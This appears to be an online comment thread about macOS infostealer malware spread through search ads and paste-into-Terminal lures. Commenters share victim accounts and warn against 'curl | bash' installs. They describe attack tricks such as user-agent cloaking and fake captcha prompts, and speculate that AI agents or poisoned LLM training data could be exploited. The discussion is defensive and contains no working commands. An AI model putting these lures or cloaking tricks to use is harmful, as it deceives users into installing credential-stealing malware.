More Mac malware from Google search

Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions (e.g. the new "native" Claude Code install)...

Publish through homebrew like a civilized person, please!

DO NOT GOOGLE EXPRESS VPN!

The GitHub links are one of the nastiest Malware I ever encountered in my life!

I steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!

Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.

Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!

It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative.. damn.. I changed my Google Password 5 times and the attacker was still able to log-in, it was so devastating! I had to change my email passwords multiple times too.

Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each acccess requires a new key, that can only be derived with a valid reply that makes safe that the attacker can be logged out safely.

> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,

I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.

In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.

> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands

Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.

---

Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.

This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal. After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign. But for someone who is non technical might have ran with it.

this curl | shell installation is actually insane. It was insane 10 years ago and it is going to be insane 10 years from now. Do not do it.

What is an 'AMOS stealer'?

GitHub too https://iboostup.com/blog/ai-fake-repositories-github

At least macos has file access permissions.

I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.

A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of a iOS Settings app page. With the new ui this was extremely effective, as the page title is just a tiny thing down the bottom in scrolled state.

I don’t know what is going on, but I’d assume the problem is AI moderation.

Google falling from grace. What happened to it? Google Search used to be useful in the past.

I imagine that an AI agent like OpenClaw, if given browser access and system control with Peekaboo or similar could easily fall prey to this attack.

Are we still pushing the myth that anti-malware on Mac isn't necessary?

Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?

Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.

Careful out there.

Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.

Another reason to avoid Medium like cold grits.

[dead]

This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.

A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.